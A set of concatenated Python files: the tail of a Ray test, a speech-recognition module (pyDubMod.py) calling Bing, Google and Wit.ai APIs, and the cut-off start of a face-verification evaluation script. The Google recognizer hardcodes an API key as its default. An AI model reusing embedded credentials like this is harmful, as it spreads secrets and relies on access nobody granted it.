os.kill(proc.pid, signal.SIGTERM)
print(proc.wait(timeout=10))
err_str = proc.stderr.read().decode("ascii")
assert len(err_str) > 0
assert "StackTrace Information" not in err_str
print(err_str)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
@pytest.mark.skipif(
os.environ.get("RAY_MINIMAL") == "1",
reason="This test currently fails with minimal install.")
@pytest.mark.parametrize("execution_number", range(3))
def test_empty_line_thread_safety_bug(execution_number, ray_start_cluster):
"""Make sure when new threads are used within __init__,
the empty line is not printed.
Related: https://github.com/ray-project/ray/pull/20987
"""
cluster = ray_start_cluster
cluster.add_node(num_cpus=24)
actor_repr = "TESTER"
script = f"""
import time
import os
import threading
import torch
from filelock import FileLock
import ray
class Repro:
pass
def do_lock():
path = f"/tmp/lock"
lock = FileLock(path, timeout=4)
lock.acquire()
@ray.remote
class Train:
def __init__(self, config: Repro):
# print("b")
def warmup():
do_lock()
torch.empty(0, device="cpu")
for _ in range(300000000):
pass
threading.Thread(target=warmup, daemon=True).start()
def ready(self):
pass
def __repr__(self):
return "{actor_repr}"
ray.init("auto")
actors = [Train.remote(config=None) for i in range(24)]
for a in actors:
ray.get(a.ready.remote())
time.sleep(5)
"""
out = run_string_as_driver(script)
assert actor_repr not in out
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == "_ray_instance":
# Set object store memory very low so that it won't complain
# about low shm memory in Linux environment.
# The test failures currently complain it only has 2 GB memory,
# so let's set it much lower than that.
MB = 1000**2
ray.init(num_cpus=1, object_store_memory=(100 * MB))
ray.shutdown()
else:
sys.exit(pytest.main(["-v", __file__]))
|
pyDubMod.py
|
#pydub imports
import os
from requests import Request
import requests
import json
import uuid
import string
from pydub import AudioSegment
import io, subprocess, wave, aifc, base64
import math, audioop, collections, threading
import platform, stat, random
# define exceptions
class TimeoutError(Exception): pass
class RequestError(Exception): pass
class UnknownValueError(Exception): pass
class AudioSource(object):
def __init__(self):
raise NotImplementedError("this is an abstract class")
def __enter__(self):
raise NotImplementedError("this is an abstract class")
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError("this is an abstract class")
class AudioFile(AudioSource):
"""
Creates a new ``AudioFile`` instance given a WAV/AIFF/FLAC audio file `filename_or_fileobject`. Subclass of ``AudioSource``.
If ``filename_or_fileobject`` is a string, then it is interpreted as a path to an audio file on the filesystem. Otherwise, ``filename_or_fileobject`` should be a file-like object such as ``io.BytesIO`` or similar.
Note that functions that read from the audio (such as ``recognizer_instance.record`` or ``recognizer_instance.listen``) will move ahead in the stream. For example, if you execute ``recognizer_instance.record(audiofile_instance, duration=10)`` twice, the first time it will return the first 10 seconds of audio, and the second time it will return the 10 seconds of audio right after that. This is always reset to the beginning when entering an ``AudioFile`` context.
WAV files must be in PCM/LPCM format; WAVE_FORMAT_EXTENSIBLE and compressed WAV are not supported and may result in undefined behaviour.
Both AIFF and AIFF-C (compressed AIFF) formats are supported.
FLAC files must be in native FLAC format; OGG-FLAC is not supported and may result in undefined behaviour.
"""
def __init__(self, filename_or_fileobject):
if str is bytes: # Python 2 - if a file path is specified, it must either be a `str` instance or a `unicode` instance
assert isinstance(filename_or_fileobject, (str, unicode)) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
else: # Python 3 - if a file path is specified, it must be a `str` instance
assert isinstance(filename_or_fileobject, str) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
self.filename_or_fileobject = filename_or_fileobject
self.stream = None
self.DURATION = None
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
try:
# attempt to read the file as WAV
self.audio_reader = wave.open(self.filename_or_fileobject, "rb")
self.little_endian = True # RIFF WAV is a little-endian format (most ``audioop`` operations assume that the frames are stored in little-endian form)
except wave.Error:
try:
# attempt to read the file as AIFF
self.audio_reader = aifc.open(self.filename_or_fileobject, "rb")
self.little_endian = False # AIFF is a big-endian format
except aifc.Error:
# attempt to read the file as FLAC
if hasattr(self.filename_or_fileobject, "read"):
flac_data = self.filename_or_fileobject.read()
else:
with open(self.filename_or_fileobject, "rb") as f: flac_data = f.read()
# run the FLAC converter with the FLAC data to get the AIFF data
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting AIFF file in stdout, and make sure it's not mixed with any program output
"--decode", "--force-aiff-format", # decode the FLAC file into an AIFF file
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
aiff_data, stderr = process.communicate(flac_data)
aiff_file = io.BytesIO(aiff_data)
try:
self.audio_reader = aifc.open(aiff_file, "rb")
except aifc.Error:
assert False, "Audio file could not be read as WAV, AIFF, or FLAC; check if file is corrupted"
self.little_endian = False # AIFF is a big-endian format
assert 1 <= self.audio_reader.getnchannels() <= 2, "Audio must be mono or stereo"
self.SAMPLE_WIDTH = self.audio_reader.getsampwidth()
# 24-bit audio needs some special handling for old Python versions (workaround for https://bugs.python.org/issue12866)
samples_24_bit_pretending_to_be_32_bit = False
if self.SAMPLE_WIDTH == 3: # 24-bit audio
try: audioop.bias(b"", self.SAMPLE_WIDTH, 0) # test whether this sample width is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
samples_24_bit_pretending_to_be_32_bit = True # while the ``AudioFile`` instance will outwardly appear to be 32-bit, it will actually internally be 24-bit
self.SAMPLE_WIDTH = 4 # the ``AudioFile`` instance should present itself as a 32-bit stream now, since we'll be converting into 32-bit on the fly when reading
self.SAMPLE_RATE = self.audio_reader.getframerate()
self.CHUNK = 4096
self.FRAME_COUNT = self.audio_reader.getnframes()
self.DURATION = self.FRAME_COUNT / float(self.SAMPLE_RATE)
self.stream = AudioFile.AudioFileStream(self.audio_reader, self.little_endian, samples_24_bit_pretending_to_be_32_bit)
return self
def __exit__(self, exc_type, exc_value, traceback):
if not hasattr(self.filename_or_fileobject, "read"): # only close the file if it was opened by this class in the first place (if the file was originally given as a path)
self.audio_reader.close()
self.stream = None
self.DURATION = None
class AudioFileStream(object):
def __init__(self, audio_reader, little_endian, samples_24_bit_pretending_to_be_32_bit):
self.audio_reader = audio_reader # an audio file object (e.g., a `wave.Wave_read` instance)
self.little_endian = little_endian # whether the audio data is little-endian (when working with big-endian things, we'll have to convert it to little-endian before we process it)
self.samples_24_bit_pretending_to_be_32_bit = samples_24_bit_pretending_to_be_32_bit # this is true if the audio is 24-bit audio, but 24-bit audio isn't supported, so we have to pretend that this is 32-bit audio and convert it on the fly
def read(self, size = -1):
buffer = self.audio_reader.readframes(self.audio_reader.getnframes() if size == -1 else size)
if not isinstance(buffer, bytes): buffer = b"" # workaround for https://bugs.python.org/issue24608
sample_width = self.audio_reader.getsampwidth()
if not self.little_endian: # big endian format, convert to little endian on the fly
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4 (incidentally, that also means that we don't need to worry about 24-bit audio being unsupported, since Python 3.4+ always has that functionality)
buffer = audioop.byteswap(buffer, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
buffer = buffer[sample_width - 1::-1] + b"".join(buffer[i + sample_width:i:-1] for i in range(sample_width - 1, len(buffer), sample_width))
# workaround for https://bugs.python.org/issue12866
if self.samples_24_bit_pretending_to_be_32_bit: # we need to convert samples from 24-bit to 32-bit before we can process them with ``audioop`` functions
buffer = b"".join("\x00" + buffer[i:i + sample_width] for i in range(0, len(buffer), sample_width)) # since we're in little endian, we prepend a zero byte to each 24-bit sample to get a 32-bit sample
if self.audio_reader.getnchannels() != 1: # stereo audio
buffer = audioop.tomono(buffer, sample_width, 1, 1) # convert stereo audio data to mono
return buffer
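# Hedged usage sketch, illustrative only (the WAV path below is hypothetical): entering
# an ``AudioFile`` context opens the file, rewinds to the beginning, and exposes
# ``stream``, ``SAMPLE_RATE``, ``SAMPLE_WIDTH`` and ``DURATION``:
#
#     with AudioFile("example.wav") as source:              # hypothetical path
#         chunk = source.stream.read(source.CHUNK)          # raw little-endian PCM bytes
#         print(source.SAMPLE_RATE, source.SAMPLE_WIDTH, source.DURATION)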
class AudioData(object):
def __init__(self, frame_data, sample_rate, sample_width):
assert sample_rate > 0, "Sample rate must be a positive integer"
assert sample_width % 1 == 0 and 1 <= sample_width <= 4, "Sample width must be between 1 and 4 inclusive"
self.frame_data = frame_data
self.sample_rate = sample_rate
self.sample_width = int(sample_width)
def get_raw_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the raw frame data for the audio represented by the ``AudioData`` instance.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `RAW/PCM audio file <https://en.wikipedia.org/wiki/Raw_audio_format>`__.
"""
assert convert_rate is None or convert_rate > 0, "Sample rate to convert to must be a positive integer"
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 4), "Sample width to convert to must be between 1 and 4 inclusive"
raw_data = self.frame_data
# make sure unsigned 8-bit audio (which uses unsigned samples) is handled like higher sample width audio (which uses signed samples)
if self.sample_width == 1:
raw_data = audioop.bias(raw_data, 1, -128) # subtract 128 from every sample to make them act like signed samples
# resample audio at the desired rate if specified
if convert_rate is not None and self.sample_rate != convert_rate:
raw_data, _ = audioop.ratecv(raw_data, self.sample_width, 1, self.sample_rate, convert_rate, None)
# convert samples to desired sample width if specified
if convert_width is not None and self.sample_width != convert_width:
if convert_width == 3: # we're converting the audio into 24-bit (workaround for https://bugs.python.org/issue12866)
raw_data = audioop.lin2lin(raw_data, self.sample_width, 4) # convert audio into 32-bit first, which is always supported
try: audioop.bias(b"", 3, 0) # test whether 24-bit audio is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
raw_data = b"".join(raw_data[i + 1:i + 4] for i in range(0, len(raw_data), 4)) # since we're in little endian, we discard the first byte from each 32-bit sample to get a 24-bit sample
else: # 24-bit audio fully supported, we don't need to shim anything
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
else:
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
# if the output is 8-bit audio with unsigned samples, convert the samples we've been treating as signed to unsigned again
if convert_width == 1:
raw_data = audioop.bias(raw_data, 1, 128) # add 128 to every sample to make them act like unsigned samples again
return raw_data
def get_wav_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the contents of a WAV file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `WAV file <https://en.wikipedia.org/wiki/WAV>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
# generate the WAV file contents
with io.BytesIO() as wav_file:
wav_writer = wave.open(wav_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
wav_writer.setframerate(sample_rate)
wav_writer.setsampwidth(sample_width)
wav_writer.setnchannels(1)
wav_writer.writeframes(raw_data)
wav_data = wav_file.getvalue()
finally: # make sure resources are cleaned up
wav_writer.close()
return wav_data
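# Hedged usage sketch, illustrative only (the output path is hypothetical): converting an
# ``AudioData`` instance to 16 kHz, 16-bit mono WAV bytes and writing them out, which
# mirrors what the recognizers below do before sending audio to a web API:
#
#     wav_bytes = audio_data.get_wav_data(convert_rate=16000, convert_width=2)
#     with open("converted.wav", "wb") as f:
#         f.write(wav_bytes)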
class Recognizer(AudioSource):
def __init__(self):
"""
Creates a new ``Recognizer`` instance, which represents a collection of speech recognition functionality.
"""
self.energy_threshold = 300 # minimum audio energy to consider for recording
self.dynamic_energy_threshold = True
self.dynamic_energy_adjustment_damping = 0.15
self.dynamic_energy_ratio = 1.5
self.pause_threshold = 0.8 # seconds of non-speaking audio before a phrase is considered complete
self.phrase_threshold = 0.3 # minimum seconds of speaking audio before we consider the speaking audio a phrase - values below this are ignored (for filtering out clicks and pops)
self.non_speaking_duration = 0.5 # seconds of non-speaking audio to keep on both sides of the recording
def record(self, source, duration = None, offset = None):
"""
Records up to ``duration`` seconds of audio from ``source`` (an ``AudioSource`` instance) starting at ``offset`` (or at the beginning if not specified) into an ``AudioData`` instance, which it returns.
If ``duration`` is not specified, then it will record until there is no more audio input.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before recording, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
frames = io.BytesIO()
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
offset_time = 0
offset_reached = False
while True: # loop for the total number of chunks needed
if offset and not offset_reached:
offset_time += seconds_per_buffer
if offset_time > offset:
offset_reached = True
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break
if offset_reached or not offset:
elapsed_time += seconds_per_buffer
if duration and elapsed_time > duration: break
frames.write(buffer)
frame_data = frames.getvalue()
frames.close()
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def adjust_for_ambient_noise(self, source, duration = 1):
"""
Adjusts the energy threshold dynamically using audio from ``source`` (an ``AudioSource`` instance) to account for ambient noise.
Intended to calibrate the energy threshold with the ambient energy level. Should be used on periods of audio without speech - will stop early if any speech is detected.
The ``duration`` parameter is the maximum number of seconds that it will dynamically adjust the threshold for before returning. This value should be at least 0.5 in order to get a representative sample of the ambient noise.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before adjusting, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
# adjust energy threshold until a phrase starts
while True:
elapsed_time += seconds_per_buffer
if elapsed_time > duration: break
buffer = source.stream.read(source.CHUNK)
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
# dynamically adjust the energy threshold using asymmetric weighted average
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
def listen(self, source, timeout = None):
"""
Records a single phrase from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
This is done by waiting until the audio has an energy above ``recognizer_instance.energy_threshold`` (the user has started speaking), and then recording until it encounters ``recognizer_instance.pause_threshold`` seconds of non-speaking or there is no more audio input. The ending silence is not included.
The ``timeout`` parameter is the maximum number of seconds that it will wait for a phrase to start before giving up and throwing a ``TimeoutError`` exception (as defined in this module). If ``timeout`` is ``None``, it will wait indefinitely.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before listening, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of non-speaking audio before the phrase is complete
phrase_buffer_count = int(math.ceil(self.phrase_threshold / seconds_per_buffer)) # minimum number of buffers of speaking audio before we consider the speaking audio a phrase
non_speaking_buffer_count = int(math.ceil(self.non_speaking_duration / seconds_per_buffer)) # maximum number of buffers of non-speaking audio to retain before and after
# read audio input for phrases until there is a phrase that is long enough
elapsed_time = 0 # number of seconds of audio read
while True:
frames = collections.deque()
# store audio input until the phrase starts
while True:
elapsed_time += seconds_per_buffer
if timeout and elapsed_time > timeout: # handle timeout if specified
raise TimeoutError("listening timed out")
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
if len(frames) > non_speaking_buffer_count: # ensure we only keep the needed amount of non-speaking buffers
frames.popleft()
# detect whether speaking has started on audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold: break
# dynamically adjust the energy threshold using asymmetric weighted average
if self.dynamic_energy_threshold:
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
# read audio input until the phrase ends
pause_count, phrase_count = 0, 0
while True:
elapsed_time += seconds_per_buffer
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
phrase_count += 1
# check if speaking has stopped for longer than the pause threshold on the audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold:
pause_count = 0
else:
pause_count += 1
if pause_count > pause_buffer_count: # end of the phrase
break
# check how long the detected phrase is, and retry listening if the phrase is too short
phrase_count -= pause_count
if phrase_count >= phrase_buffer_count: break # phrase is long enough, stop listening
# obtain frame data
for i in range(pause_count - non_speaking_buffer_count): frames.pop() # remove extra non-speaking frames at the end
frame_data = b"".join(list(frames))
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
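# Worked example for the buffer counts computed at the top of ``listen``, assuming a
# source with CHUNK = 4096 and SAMPLE_RATE = 16000, i.e. seconds_per_buffer = 4096 / 16000 = 0.256 s:
#   pause_buffer_count        = ceil(0.8 / 0.256) = 4   buffers of silence end a phrase
#   phrase_buffer_count       = ceil(0.3 / 0.256) = 2   buffers of speech make a phrase
#   non_speaking_buffer_count = ceil(0.5 / 0.256) = 2   silence buffers kept on each side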
def listen_in_background(self, source, callback):
"""
Spawns a thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase is detected.
Returns a function object that, when called, requests that the background listener thread stop, and waits until it does before returning. The background thread is a daemon and will not stop the program from exiting if there are no other non-daemon threads.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that the ``callback`` function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
running = [True]
def threaded_listen():
with source as s:
while running[0]:
try: # listen for 1 second, then check again if the stop function has been called
audio = self.listen(s, 1)
except TimeoutError: # listening timed out, just try again
pass
else:
if running[0]: callback(self, audio)
def stopper():
running[0] = False
listener_thread.join() # block until the background thread is done, which can be up to 1 second
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.daemon = True
listener_thread.start()
return stopper
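# Hedged usage sketch of background listening with a callback; ``some_source`` stands for
# any ``AudioSource`` (for example an ``AudioFile``) and the callback name is hypothetical.
# The callback runs on the daemon worker thread:
#
#     r = Recognizer()
#     def on_phrase(recognizer, audio):
#         print(len(audio.frame_data), "bytes captured")
#     stop = r.listen_in_background(some_source, on_phrase)
#     ...                                   # do other work while phrases are collected
#     stop()                                # blocks until the worker thread exits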
def recognize_bing(self, audio_data, key, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Microsoft Bing Voice Recognition API.
The Microsoft Bing Voice Recognition API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://www.microsoft.com/cognitive-services/en-us/speech-api>`__ with Microsoft Cognitive Services.
To get the API key, go to the `Microsoft Cognitive Services subscriptions overview <https://www.microsoft.com/cognitive-services/en-us/subscriptions>`__, go to the entry titled "Speech", and look for the key under the "Keys" column. Microsoft Bing Voice Recognition API keys are 32-character lowercase hexadecimal strings.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-4-supported-locales>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-3-voice-recognition-responses>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "`key` must be a string"
assert isinstance(language, str), "`language` must be a string"
access_token, expire_time = getattr(self, "bing_cached_access_token", None), getattr(self, "bing_cached_access_token_expiry", None)
allow_caching = True
try:
from time import monotonic # we need monotonic time to avoid being affected by system clock changes, but this is only available in Python 3.3+
except ImportError:
try:
from monotonic import monotonic # use time.monotonic backport for Python 2 if available (from https://pypi.python.org/pypi/monotonic)
except (ImportError, RuntimeError):
expire_time = None # monotonic time not available, don't cache access tokens
allow_caching = False # don't allow caching, since monotonic time isn't available
if expire_time is None or monotonic() > expire_time: # caching not enabled, first credential request, or the access token from the previous one expired
# get an access token using OAuth
credential_url = "https://oxford-speech.cloudapp.net/token/issueToken"
credential_request = Request(credential_url, data = urlencode({
"grant_type": "client_credentials",
"client_id": "python",
"client_secret": key,
"scope": "https://speech.platform.bing.com"
}).encode("utf-8"))
if allow_caching:
start_time = monotonic()
try:
credential_response = urlopen(credential_request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
credential_text = credential_response.read().decode("utf-8")
credentials = json.loads(credential_text)
access_token, expiry_seconds = credentials["access_token"], float(credentials["expires_in"])
if allow_caching:
# save the token for the duration it is valid for
self.bing_cached_access_token = access_token
self.bing_cached_access_token_expiry = start_time + expiry_seconds
wav_data = audio_data.get_wav_data(
convert_rate = 16000, # audio samples must be 8kHz or 16 kHz
convert_width = 2 # audio samples should be 16-bit
)
url = "https://speech.platform.bing.com/recognize/query?{0}".format(urlencode({
"version": "3.0",
"requestid": uuid.uuid4(),
"appID": "D4D52672-91D7-4C74-8AD8-42B1D98141A5",
"format": "json",
"locale": language,
"device.os": "wp7",
"scenarios": "ulm",
"instanceid": uuid.uuid4(),
"result.profanitymarkup": "0",
}))
request = Request(url, data = wav_data, headers = {
"Authorization": "Bearer {0}".format(access_token),
"Content-Type": "audio/wav; samplerate=16000; sourcerate={0}; trustsourcerate=true".format(audio_data.sample_rate),
})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "header" not in result or "lexical" not in result["header"]: raise UnknownValueError()
return result["header"]["lexical"]
def recognize_google(self,audio_data, key = None, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Speech Recognition API.
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box. This should generally be used for personal or testing purposes only, as it **may be revoked by Google at any time**.
To obtain your own API key, simply follow the steps on the `API Keys <http://www.chromium.org/developers/how-tos/api-keys>`__ page at the Chromium Developers site. In the Google Developers Console, Google Speech Recognition is listed as "Speech API".
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in this `StackOverflow answer <http://stackoverflow.com/a/14302134>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
assert isinstance(audio_data, AudioData), "`audio_data` must be audio data"
assert key is None or isinstance(key, str), "`key` must be `None` or a string"
assert isinstance(language, str), "`language` must be a string"
#module uses flac by default, which attempts to open a subprocess which fails on Heroku
#modified this function to use a wav file instead, which Google apparently supports
wav_data = audio_data.get_wav_data(
convert_rate = 16000, # audio is resampled to 16 kHz
convert_width = 2 # audio samples must be 16-bit
)
#we're using the Google Chromium Speech APIv2 which has been deprecated in favor of the Google Cloud Speech API
#this API is meant for devs, and has a wonky process to enable which involves joining a Google Group
if key is None: key = "AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw"
url = "http://www.google.com/speech-api/v2/recognize?{0}".format(urlencode({
"client": "chromium",
"lang": language,
"key": key,
}))
#changed header parameters for wav file
request = Request(url, data = wav_data, headers = {"Content-Type": "audio/l16; rate=16000"})
# obtain audio transcription results
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
break
# return results
if show_all: return actual_result
if "alternative" not in actual_result: raise UnknownValueError()
for entry in actual_result["alternative"]:
if "transcript" in entry:
return entry["transcript"]
raise UnknownValueError() # no transcriptions available
def recognize_wit(self, audio_data, key, show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Wit.ai API.
The Wit.ai API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://wit.ai/>`__ and creating an app. You will need to add at least one intent to the app before you can see the API key, though the actual intent settings don't matter.
To get the API key for a Wit.ai app, go to the app's overview page, go to the section titled "Make an API request", and look for something along the lines of ``Authorization: Bearer XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX``; ``XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`` is the API key. Wit.ai API keys are 32-character uppercase alphanumeric strings.
The recognition language is configured in the Wit.ai app settings.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://wit.ai/docs/http/20141022#get-intent-via-text-link>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "`key` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate = None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width = 2 # audio samples should be 16-bit
)
url = "https://api.wit.ai/speech?v=20141022"
request = Request(url, data = wav_data, headers = {"Authorization": "Bearer {0}".format(key), "Content-Type": "audio/wav"})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "_text" not in result or result["_text"] is None: raise UnknownValueError()
return result["_text"]
|
lfw_eval.py
|
import multiprocessing as mp
import os
import pickle
import queue
from multiprocessing import Process
import cv2 as cv
import dlib
import numpy as np
from keras.applications.inception_resnet_v2 import preprocess_input
from tqdm import tqdm
from config import lfw_folder, img_size, channel, threshold, predictor_path
from utils import get_lfw_images, get_lfw_pairs, get_best_model
class InferenceWorker(Process):
def __init__(self, gpuid, in_queue, out_queue, signal_queue):
Process.__init__(self, name='ImageProcessor')
self.gpuid = gpuid
self.in_queue = in_queue
self.out_queue = out_queue
self.signal_queue = signal_queue
self.detector = dlib.get_frontal_face_detector()
self.sp = dlib.shape_predictor(predictor_path)
def run(self):
# select the GPU via environment variables
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = str(self.gpuid)
print("InferenceWorker init, GPU ID: {}".format(self.gpuid))
from model import build_model
# load models
model = build_model()
model.load_weights(get_best_model())
while True:
try:
sample = {}
try:
sample['a'] = self.in_queue.get(block=False)
sample['p'] = self.in_queue.get(block=False)
sample['n'] = self.in_queue.get(block=False)
except queue.Empty:
break
batch_inputs = np.empty((3, 1, img_size, img_size, channel), dtype=np.float32)
for j, role in enumerate(['a', 'p', 'n']):
image_name = sample[role]
filename = os.path.join(lfw_folder, image_name)
image = cv.imread(filename)
image = image[:, :, ::-1] # RGB
dets = self.detector(image, 1)
num_faces = len(dets)
if num_faces > 0:
# Find the 5 face landmarks we need to do the alignment.
faces = dlib.full_object_detections()
for detection in dets:
faces.append(self.sp(image, detection))
image = dlib.get_face_chip(image, faces[0], size=img_size)
else:
